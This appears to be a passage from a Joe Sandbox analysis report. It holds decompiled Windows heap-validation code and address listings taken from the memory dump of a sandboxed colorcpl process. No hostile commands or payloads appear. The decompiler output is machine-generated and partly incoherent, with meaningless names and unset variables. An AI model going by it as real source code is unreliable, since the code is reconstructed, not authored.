                                                                                                								if(_t320 == 0) {
                                                                                                									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                                                                									L34:
                                                                                                									_t63 = _t415 + 8; // -16
                                                                                                									E06E3BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                                                                									_t374 = _v24;
                                                                                                									goto L35;
                                                                                                								}
                                                                                                								_t402 = _t320;
                                                                                                							}
                                                                                                							_t322 = _t385;
                                                                                                							goto L34;
                                                                                                						}
                                                                                                					}
                                                                                                					if(_a20 == 0) {
                                                                                                						L18:
                                                                                                						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                                                                							goto L67;
                                                                                                						}
                                                                                                						if(E06EC23E3(_t414, _t415) == 0) {
                                                                                                							goto L117;
                                                                                                						}
                                                                                                						goto L67;
                                                                                                					} else {
                                                                                                						if((_t390 & 0x00000002) == 0) {
                                                                                                							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                                                                						} else {
                                                                                                							_t328 = E06E11F5B(_t415);
                                                                                                							_t342 = _v20;
                                                                                                							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                                                                						}
                                                                                                						_t429 = _t326;
                                                                                                						if(_t429 == 0) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						if(_t429 >= 0) {
                                                                                                							__eflags = _t326 & 0x00000800;
                                                                                                							if(__eflags != 0) {
                                                                                                								goto L18;
                                                                                                							}
                                                                                                							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                                                                							if(__eflags >= 0) {
                                                                                                								goto L18;
                                                                                                							}
                                                                                                							_t412 = _a20;
                                                                                                							_t327 = _t326 & 0x0000ffff;
                                                                                                							L17:
                                                                                                							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						_t327 = _t326 & 0x00007fff;
                                                                                                						if(_t327 >= 0x81) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						_t412 = _a24;
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					L86:
                                                                                                				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                                                                				_t189 = _v12;
                                                                                                				goto L88;
                                                                                                			}



































































                                                                                                0x06ed4f39
                                                                                                0x06ed4e0e
                                                                                                0x06ed4e14
                                                                                                0x06ed4e1b
                                                                                                0x06ed4e25
                                                                                                0x06ed4e2b
                                                                                                0x06ed4e2b
                                                                                                0x06ed4e33
                                                                                                0x06ed4e38
                                                                                                0x06ed4e8a
                                                                                                0x06ed4e8a
                                                                                                0x00000000
                                                                                                0x06ed4e3a
                                                                                                0x06ed4e3e
                                                                                                0x06ed4e43
                                                                                                0x06ed4e47
                                                                                                0x06ed4e53
                                                                                                0x06ed4e58
                                                                                                0x06ed4e5a
                                                                                                0x06ed4e5c
                                                                                                0x06ed4e61
                                                                                                0x06ed4e61
                                                                                                0x06ed4e5a
                                                                                                0x06ed4e6e
                                                                                                0x06ed4f41
                                                                                                0x06ed4f47
                                                                                                0x06ed4f4b
                                                                                                0x06ed4f6a
                                                                                                0x06ed4f6f
                                                                                                0x06ed4f4d
                                                                                                0x06ed4f62
                                                                                                0x06ed4f67
                                                                                                0x06ed4f7f
                                                                                                0x06ed4f80
                                                                                                0x06ed4f81
                                                                                                0x00000000
                                                                                                0x06ed4e74
                                                                                                0x06ed4e78
                                                                                                0x06ed4e82
                                                                                                0x06ed4e88
                                                                                                0x06ed4e88
                                                                                                0x00000000
                                                                                                0x06ed4e78
                                                                                                0x06ed4e6e
                                                                                                0x06ed4e38
                                                                                                0x06ed4df3
                                                                                                0x06ed4bfe
                                                                                                0x06ed4c01
                                                                                                0x06ed4c04
                                                                                                0x06ed4c07
                                                                                                0x06ed4c09
                                                                                                0x06ed4c0c
                                                                                                0x06ed4c0e
                                                                                                0x06ed4c0e
                                                                                                0x06ed4c11
                                                                                                0x06ed4c11
                                                                                                0x06ed4c0c
                                                                                                0x06ed4c14
                                                                                                0x06ed4c17
                                                                                                0x06ed4dae
                                                                                                0x06ed4db2
                                                                                                0x06ed4db7
                                                                                                0x06ed4dba
                                                                                                0x06ed4dbd
                                                                                                0x06ed4ef1
                                                                                                0x06ed4ef7
                                                                                                0x06ed4efb
                                                                                                0x06ed4f1a
                                                                                                0x06ed4f1f
                                                                                                0x06ed4efd
                                                                                                0x06ed4f12
                                                                                                0x06ed4f17
                                                                                                0x06ed4f2b
                                                                                                0x06ed4f2b
                                                                                                0x06ed4f2d
                                                                                                0x06ed4f2e
                                                                                                0x06ed4f2f
                                                                                                0x00000000
                                                                                                0x06ed4f2f
                                                                                                0x00000000
                                                                                                0x06ed4c1d
                                                                                                0x06ed4c1d
                                                                                                0x06ed4c20
                                                                                                0x06ed4c23
                                                                                                0x06ed4c26
                                                                                                0x06ed4c29
                                                                                                0x06ed4c2c
                                                                                                0x06ed4c2e
                                                                                                0x06ed4d91
                                                                                                0x06ed4d91
                                                                                                0x06ed4d92
                                                                                                0x06ed4d97
                                                                                                0x06ed4d9e
                                                                                                0x00000000
                                                                                                0x06ed4d9e
                                                                                                0x06ed4c34
                                                                                                0x06ed4c37
                                                                                                0x06ed4c39
                                                                                                0x06ed4c3c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4c45
                                                                                                0x06ed4c48
                                                                                                0x06ed4c4e
                                                                                                0x06ed4c50
                                                                                                0x06ed4c78
                                                                                                0x06ed4c78
                                                                                                0x06ed4c7b
                                                                                                0x06ed4c7d
                                                                                                0x06ed4c80
                                                                                                0x06ed4c84
                                                                                                0x06ed4cad
                                                                                                0x06ed4cad
                                                                                                0x06ed4cb0
                                                                                                0x06ed4cb8
                                                                                                0x06ed4cbb
                                                                                                0x06ed4cbe
                                                                                                0x06ed4cc1
                                                                                                0x06ed4cc7
                                                                                                0x06ed4cdc
                                                                                                0x06ed4cc9
                                                                                                0x06ed4cd2
                                                                                                0x06ed4cd4
                                                                                                0x06ed4cd4
                                                                                                0x06ed4cde
                                                                                                0x06ed4ce0
                                                                                                0x06ed4d13
                                                                                                0x06ed4d13
                                                                                                0x06ed4d16
                                                                                                0x06ed4d18
                                                                                                0x06ed4d29
                                                                                                0x06ed4d2a
                                                                                                0x06ed4d2c
                                                                                                0x06ed4d34
                                                                                                0x06ed4d1a
                                                                                                0x06ed4d1a
                                                                                                0x06ed4d1a
                                                                                                0x06ed4d1d
                                                                                                0x06ed4d1f
                                                                                                0x06ed4d22
                                                                                                0x06ed4d24
                                                                                                0x06ed4d24
                                                                                                0x06ed4d3c
                                                                                                0x06ed4d3f
                                                                                                0x06ed4d45
                                                                                                0x06ed4d47
                                                                                                0x06ed4d6c
                                                                                                0x06ed4d6c
                                                                                                0x06ed4d70
                                                                                                0x06ed4d7e
                                                                                                0x06ed4d84
                                                                                                0x06ed4d84
                                                                                                0x00000000
                                                                                                0x06ed4d49
                                                                                                0x06ed4d49
                                                                                                0x06ed4d56
                                                                                                0x06ed4d56
                                                                                                0x06ed4d59
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4d4e
                                                                                                0x06ed4d50
                                                                                                0x06ed4d52
                                                                                                0x06ed4d8e
                                                                                                0x06ed4d5d
                                                                                                0x06ed4d5f
                                                                                                0x06ed4d67
                                                                                                0x00000000
                                                                                                0x06ed4d67
                                                                                                0x06ed4d54
                                                                                                0x06ed4d54
                                                                                                0x06ed4d5b
                                                                                                0x00000000
                                                                                                0x06ed4d5b
                                                                                                0x06ed4ce2
                                                                                                0x06ed4ce2
                                                                                                0x06ed4ce5
                                                                                                0x06ed4ce5
                                                                                                0x06ed4ce7
                                                                                                0x06ed4cfb
                                                                                                0x06ed4ce9
                                                                                                0x06ed4ce9
                                                                                                0x06ed4cec
                                                                                                0x06ed4cef
                                                                                                0x06ed4cf1
                                                                                                0x06ed4cf3
                                                                                                0x06ed4cf3
                                                                                                0x06ed4cf3
                                                                                                0x06ed4cf6
                                                                                                0x06ed4cf6
                                                                                                0x06ed4d02
                                                                                                0x06ed4d05
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4d07
                                                                                                0x06ed4d0f
                                                                                                0x06ed4d11
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4d11
                                                                                                0x00000000
                                                                                                0x06ed4ce5
                                                                                                0x06ed4ce0
                                                                                                0x06ed4c8a
                                                                                                0x06ed4c8f
                                                                                                0x06ed4c91
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4c9d
                                                                                                0x00000000
                                                                                                0x06ed4c9d
                                                                                                0x06ed4c52
                                                                                                0x06ed4c5f
                                                                                                0x06ed4c5f
                                                                                                0x06ed4c62
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4c57
                                                                                                0x06ed4c59
                                                                                                0x06ed4c5b
                                                                                                0x06ed4caa
                                                                                                0x06ed4c66
                                                                                                0x06ed4c68
                                                                                                0x06ed4c70
                                                                                                0x06ed4c75
                                                                                                0x00000000
                                                                                                0x06ed4c75
                                                                                                0x06ed4c5d
                                                                                                0x06ed4c5d
                                                                                                0x06ed4c64
                                                                                                0x00000000
                                                                                                0x06ed4c64
                                                                                                0x06ed4c17
                                                                                                0x06ed4b75
                                                                                                0x06ed4bc4
                                                                                                0x06ed4bc8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4bd9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4b77
                                                                                                0x06ed4b7a
                                                                                                0x06ed4b8c
                                                                                                0x06ed4b7c
                                                                                                0x06ed4b7e
                                                                                                0x06ed4b83
                                                                                                0x06ed4b86
                                                                                                0x06ed4b86
                                                                                                0x06ed4b90
                                                                                                0x06ed4b93
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4b95
                                                                                                0x06ed4bab
                                                                                                0x06ed4bb0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4bb2
                                                                                                0x06ed4bb9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                • API String ID: 0-3591852110
                                                                                                • Opcode ID: f0ed04c5ac2fcaa4f24546a761632241a7aef59eca8f780df85b28d90d487743
                                                                                                • Instruction ID: ca52ffa7b752c50d9caf386943623fb42a2297106531b6ee54282dd8a1c5e543
                                                                                                • Opcode Fuzzy Hash: f0ed04c5ac2fcaa4f24546a761632241a7aef59eca8f780df85b28d90d487743
                                                                                                • Instruction Fuzzy Hash: 1E12F270610741EFD7A5CF28C885BBAB7F5FF18308F15A459E8968B681D734E886CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 56%
                                                                                                			E06ED4496(signed int* __ecx, void* __edx) {
                                                                                                				signed int _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed char _v24;
                                                                                                				signed int* _v28;
                                                                                                				char _v32;
                                                                                                				signed int* _v36;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t150;
                                                                                                				intOrPtr _t151;
                                                                                                				signed char _t156;
                                                                                                				intOrPtr _t157;
                                                                                                				unsigned int _t169;
                                                                                                				intOrPtr _t170;
                                                                                                				signed int* _t183;
                                                                                                				signed char _t184;
                                                                                                				intOrPtr _t191;
                                                                                                				signed int _t201;
                                                                                                				intOrPtr _t203;
                                                                                                				intOrPtr _t212;
                                                                                                				intOrPtr _t220;
                                                                                                				signed int _t230;
                                                                                                				signed int _t241;
                                                                                                				signed int _t244;
                                                                                                				void* _t259;
                                                                                                				signed int _t260;
                                                                                                				signed int* _t261;
                                                                                                				intOrPtr* _t262;
                                                                                                				signed int _t263;
                                                                                                				signed int* _t264;
                                                                                                				signed int _t267;
                                                                                                				signed int* _t268;
                                                                                                				void* _t270;
                                                                                                				void* _t281;
                                                                                                				signed short _t285;
                                                                                                				signed short _t289;
                                                                                                				signed int _t291;
                                                                                                				signed int _t298;
                                                                                                				signed char _t303;
                                                                                                				signed char _t308;
                                                                                                				signed int _t314;
                                                                                                				intOrPtr _t317;
                                                                                                				unsigned int _t319;
                                                                                                				signed int* _t325;
                                                                                                				signed int _t326;
                                                                                                				signed int _t327;
                                                                                                				intOrPtr _t328;
                                                                                                				signed int _t329;
                                                                                                				signed int _t330;
                                                                                                				signed int* _t331;
                                                                                                				signed int _t332;
                                                                                                				signed int _t350;
                                                                                                
                                                                                                				_t259 = __edx;
                                                                                                				_t331 = __ecx;
                                                                                                				_v28 = __ecx;
                                                                                                				_v20 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_t150 = E06ED49A4(__ecx);
                                                                                                				_t267 = 1;
                                                                                                				if(_t150 == 0) {
                                                                                                					L61:
                                                                                                					_t151 =  *[fs:0x30];
                                                                                                					__eflags =  *((char*)(_t151 + 2));
                                                                                                					if( *((char*)(_t151 + 2)) != 0) {
                                                                                                						 *0x6f06378 = _t267;
                                                                                                						asm("int3");
                                                                                                						 *0x6f06378 = 0;
                                                                                                					}
                                                                                                					__eflags = _v12;
                                                                                                					if(_v12 != 0) {
                                                                                                						_t105 =  &_v16;
                                                                                                						 *_t105 = _v16 & 0x00000000;
                                                                                                						__eflags =  *_t105;
                                                                                                						E06E4174B( &_v12,  &_v16, 0x8000);
                                                                                                					}
                                                                                                					L65:
                                                                                                					__eflags = 0;
                                                                                                					return 0;
                                                                                                				}
                                                                                                				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                                                                					_t268 =  &(_t331[0x30]);
                                                                                                					_v32 = 0;
                                                                                                					_t260 =  *_t268;
                                                                                                					_t308 = 0;
                                                                                                					_v24 = 0;
                                                                                                					while(_t268 != _t260) {
                                                                                                						_t260 =  *_t260;
                                                                                                						_v16 =  *_t325 & 0x0000ffff;
                                                                                                						_t156 = _t325[0];
                                                                                                						_v28 = _t325;
                                                                                                						_v5 = _t156;
                                                                                                						__eflags = _t156 & 0x00000001;
                                                                                                						if((_t156 & 0x00000001) != 0) {
                                                                                                							_t157 =  *[fs:0x30];
                                                                                                							__eflags =  *(_t157 + 0xc);
                                                                                                							if( *(_t157 + 0xc) == 0) {
                                                                                                								_push("HEAP: ");
                                                                                                								E06E1B150();
                                                                                                							} else {
                                                                                                								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                							}
                                                                                                							_push(_t325);
                                                                                                							E06E1B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                                                                							L32:
                                                                                                							_t270 = 0;
                                                                                                							__eflags = _t331[0x13];
                                                                                                							if(_t331[0x13] != 0) {
                                                                                                								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                                                                								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                                                							}
                                                                                                							L60:
                                                                                                							_t267 = _t270 + 1;
                                                                                                							__eflags = _t267;
                                                                                                							goto L61;
                                                                                                						}
                                                                                                						_t169 =  *_t325 & 0x0000ffff;
                                                                                                						__eflags = _t169 - _t308;
                                                                                                						if(_t169 < _t308) {
                                                                                                							_t170 =  *[fs:0x30];
                                                                                                							__eflags =  *(_t170 + 0xc);
                                                                                                							if( *(_t170 + 0xc) == 0) {
                                                                                                								_push("HEAP: ");
                                                                                                								E06E1B150();
                                                                                                							} else {
                                                                                                								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                							}
                                                                                                							E06E1B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                                                                							goto L32;
                                                                                                						} else {
                                                                                                							__eflags = _t331[0x13];
                                                                                                							_t308 = _t169;
                                                                                                							_v24 = _t308;
                                                                                                							if(_t331[0x13] != 0) {
                                                                                                								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                                                                								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                                                								__eflags =  *_t325;
                                                                                                							}
                                                                                                							_t26 =  &_v32;
                                                                                                							 *_t26 = _v32 + 1;
                                                                                                							__eflags =  *_t26;
                                                                                                							continue;
                                                                                                						}
                                                                                                					}
                                                                                                					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                                                                					if( *0x6f06350 != 0 && _t331[0x2f] != 0) {
                                                                                                						_push(4);
                                                                                                						_push(0x1000);
                                                                                                						_push( &_v16);
                                                                                                						_push(0);
                                                                                                						_push( &_v12);
                                                                                                						_push(0xffffffff);
                                                                                                						if(E06E59660() >= 0) {
                                                                                                							_v20 = _v12 + 0x204;
                                                                                                						}
                                                                                                					}
                                                                                                					_t183 =  &(_t331[0x27]);
                                                                                                					_t281 = 0x81;
                                                                                                					_t326 =  *_t183;
                                                                                                					if(_t183 == _t326) {
                                                                                                						L49:
                                                                                                						_t261 =  &(_t331[0x29]);
                                                                                                						_t184 = 0;
                                                                                                						_t327 =  *_t261;
                                                                                                						_t282 = 0;
                                                                                                						_v24 = 0;
                                                                                                						_v36 = 0;
                                                                                                						__eflags = _t327 - _t261;
                                                                                                						if(_t327 == _t261) {
                                                                                                							L53:
                                                                                                							_t328 = _v32;
                                                                                                							_v28 = _t331;
                                                                                                							__eflags = _t328 - _t184;
                                                                                                							if(_t328 == _t184) {
                                                                                                								__eflags = _t331[0x1d] - _t282;
                                                                                                								if(_t331[0x1d] == _t282) {
                                                                                                									__eflags = _v12;
                                                                                                									if(_v12 == 0) {
                                                                                                										L82:
                                                                                                										_t267 = 1;
                                                                                                										__eflags = 1;
                                                                                                										goto L83;
                                                                                                									}
                                                                                                									_t329 = _t331[0x2f];
                                                                                                									__eflags = _t329;
                                                                                                									if(_t329 == 0) {
                                                                                                										L77:
                                                                                                										_t330 = _t331[0x22];
                                                                                                										__eflags = _t330;
                                                                                                										if(_t330 == 0) {
                                                                                                											L81:
                                                                                                											_t129 =  &_v16;
                                                                                                											 *_t129 = _v16 & 0x00000000;
                                                                                                											__eflags =  *_t129;
                                                                                                											E06E4174B( &_v12,  &_v16, 0x8000);
                                                                                                											goto L82;
                                                                                                										}
                                                                                                										_t314 = _t331[0x21] & 0x0000ffff;
                                                                                                										_t285 = 1;
                                                                                                										__eflags = 1 - _t314;
                                                                                                										if(1 >= _t314) {
                                                                                                											goto L81;
                                                                                                										} else {
                                                                                                											goto L79;
                                                                                                										}
                                                                                                										while(1) {
                                                                                                											L79:
                                                                                                											_t330 = _t330 + 0x40;
                                                                                                											_t332 = _t285 & 0x0000ffff;
                                                                                                											_t262 = _v20 + _t332 * 4;
                                                                                                											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                                                                											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t285 = _t285 + 1;
                                                                                                											__eflags = _t285 - _t314;
                                                                                                											if(_t285 < _t314) {
                                                                                                												continue;
                                                                                                											}
                                                                                                											goto L81;
                                                                                                										}
                                                                                                										_t191 =  *[fs:0x30];
                                                                                                										__eflags =  *(_t191 + 0xc);
                                                                                                										if( *(_t191 + 0xc) == 0) {
                                                                                                											_push("HEAP: ");
                                                                                                											E06E1B150();
                                                                                                										} else {
                                                                                                											E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                										}
                                                                                                										_push(_t262);
                                                                                                										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                                                                										_t148 = _t330 + 0x10; // 0x10
                                                                                                										_push( *((intOrPtr*)(_t330 + 8)));
                                                                                                										E06E1B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                                                                										L59:
                                                                                                										_t270 = 0;
                                                                                                										__eflags = 0;
                                                                                                										goto L60;
                                                                                                									}
                                                                                                									_t289 = 1;
                                                                                                									__eflags = 1;
                                                                                                									while(1) {
                                                                                                										_t201 = _v12;
                                                                                                										_t329 = _t329 + 0xc;
                                                                                                										_t263 = _t289 & 0x0000ffff;
                                                                                                										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                                                                										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t289 = _t289 + 1;
                                                                                                										__eflags = _t289 - 0x81;
                                                                                                										if(_t289 < 0x81) {
                                                                                                											continue;
                                                                                                										}
                                                                                                										goto L77;
                                                                                                									}
                                                                                                									_t203 =  *[fs:0x30];
                                                                                                									__eflags =  *(_t203 + 0xc);
                                                                                                									if( *(_t203 + 0xc) == 0) {
                                                                                                										_push("HEAP: ");
                                                                                                										E06E1B150();
                                                                                                									} else {
                                                                                                										E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                									}
                                                                                                									_t291 = _v12;
                                                                                                									_push(_t291 + _t263 * 4);
                                                                                                									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                                                                									_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                									E06E1B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                                                                									goto L59;
                                                                                                								}
                                                                                                								_t212 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t212 + 0xc);
                                                                                                								if( *(_t212 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                								}
                                                                                                								_push(_t331[0x1d]);
                                                                                                								_push(_v36);
                                                                                                								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                                                                								L58:
                                                                                                								E06E1B150();
                                                                                                								goto L59;
                                                                                                							}
                                                                                                							_t220 =  *[fs:0x30];
                                                                                                							__eflags =  *(_t220 + 0xc);
                                                                                                							if( *(_t220 + 0xc) == 0) {
                                                                                                								_push("HEAP: ");
                                                                                                								E06E1B150();
                                                                                                							} else {
                                                                                                								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                							}
                                                                                                							_push(_t328);
                                                                                                							_push(_v24);
                                                                                                							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                                                                							goto L58;
                                                                                                						} else {
                                                                                                							goto L50;
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							L50:
                                                                                                							_t92 = _t327 - 0x10; // -24
                                                                                                							_t282 = _t331;
                                                                                                							_t230 = E06ED4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                                                                							__eflags = _t230;
                                                                                                							if(_t230 == 0) {
                                                                                                								goto L59;
                                                                                                							}
                                                                                                							_t327 =  *_t327;
                                                                                                							__eflags = _t327 - _t261;
                                                                                                							if(_t327 != _t261) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							_t184 = _v24;
                                                                                                							_t282 = _v36;
                                                                                                							goto L53;
                                                                                                						}
                                                                                                						goto L59;
                                                                                                					} else {
                                                                                                						while(1) {
                                                                                                							_t39 = _t326 + 0x18; // 0x10
                                                                                                							_t264 = _t39;
                                                                                                							if(_t331[0x13] != 0) {
                                                                                                								_t319 = _t331[0x14] ^  *_t264;
                                                                                                								 *_t264 = _t319;
                                                                                                								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                                                                								_t348 = _t319 >> 0x18 - _t303;
                                                                                                								if(_t319 >> 0x18 != _t303) {
                                                                                                									_push(_t303);
                                                                                                									E06ECFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                                                                								}
                                                                                                								_t281 = 0x81;
                                                                                                							}
                                                                                                							_t317 = _v20;
                                                                                                							if(_t317 != 0) {
                                                                                                								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                                                                								_t350 = _t241;
                                                                                                								if(_t350 != 0) {
                                                                                                									if(_t350 >= 0) {
                                                                                                										__eflags = _t241 & 0x00000800;
                                                                                                										if(__eflags == 0) {
                                                                                                											__eflags = _t241 - _t331[0x21];
                                                                                                											if(__eflags < 0) {
                                                                                                												_t298 = _t241;
                                                                                                												_t65 = _t317 + _t298 * 4;
                                                                                                												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                                                                												__eflags =  *_t65;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t244 = _t241 & 0x00007fff;
                                                                                                										if(_t244 < _t281) {
                                                                                                											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E06EC23E3(_t331, _t264) == 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t331[0x13] != 0) {
                                                                                                								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                                                                								 *_t264 =  *_t264 ^ _t331[0x14];
                                                                                                							}
                                                                                                							_t326 =  *_t326;
                                                                                                							if( &(_t331[0x27]) == _t326) {
                                                                                                								goto L49;
                                                                                                							} else {
                                                                                                								_t281 = 0x81;
                                                                                                								continue;
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags = _t331[0x13];
                                                                                                						if(_t331[0x13] != 0) {
                                                                                                							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                                                                							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                                                                						}
                                                                                                						goto L65;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L83:
                                                                                                					return _t267;
                                                                                                				}
                                                                                                			}



























































                                                                                                0x06ed48dc
                                                                                                0x06ed48ec
                                                                                                0x00000000
                                                                                                0x06ed48ec
                                                                                                0x06ed48b2
                                                                                                0x06ed48bc
                                                                                                0x06ed48be
                                                                                                0x06ed48c1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48c3
                                                                                                0x06ed48c3
                                                                                                0x06ed48c6
                                                                                                0x06ed48c9
                                                                                                0x06ed48cc
                                                                                                0x06ed48d1
                                                                                                0x06ed48d4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48d6
                                                                                                0x06ed48d7
                                                                                                0x06ed48da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48da
                                                                                                0x06ed494f
                                                                                                0x06ed4955
                                                                                                0x06ed4959
                                                                                                0x06ed4978
                                                                                                0x06ed497d
                                                                                                0x06ed495b
                                                                                                0x06ed4970
                                                                                                0x06ed4975
                                                                                                0x06ed4986
                                                                                                0x06ed4987
                                                                                                0x06ed498a
                                                                                                0x06ed498d
                                                                                                0x06ed4997
                                                                                                0x06ed47ef
                                                                                                0x06ed47ef
                                                                                                0x06ed47ef
                                                                                                0x00000000
                                                                                                0x06ed47ef
                                                                                                0x06ed4890
                                                                                                0x06ed4890
                                                                                                0x06ed4891
                                                                                                0x06ed4891
                                                                                                0x06ed4894
                                                                                                0x06ed4897
                                                                                                0x06ed489d
                                                                                                0x06ed48a0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48a2
                                                                                                0x06ed48a3
                                                                                                0x06ed48a6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48a6
                                                                                                0x06ed48fb
                                                                                                0x06ed4901
                                                                                                0x06ed4905
                                                                                                0x06ed4924
                                                                                                0x06ed4929
                                                                                                0x06ed4907
                                                                                                0x06ed491c
                                                                                                0x06ed4921
                                                                                                0x06ed492f
                                                                                                0x06ed4935
                                                                                                0x06ed4936
                                                                                                0x06ed4939
                                                                                                0x06ed4942
                                                                                                0x00000000
                                                                                                0x06ed4947
                                                                                                0x06ed4835
                                                                                                0x06ed483b
                                                                                                0x06ed483f
                                                                                                0x06ed485e
                                                                                                0x06ed4863
                                                                                                0x06ed4841
                                                                                                0x06ed4856
                                                                                                0x06ed485b
                                                                                                0x06ed4869
                                                                                                0x06ed486c
                                                                                                0x06ed486f
                                                                                                0x06ed47e7
                                                                                                0x06ed47e7
                                                                                                0x00000000
                                                                                                0x06ed47ec
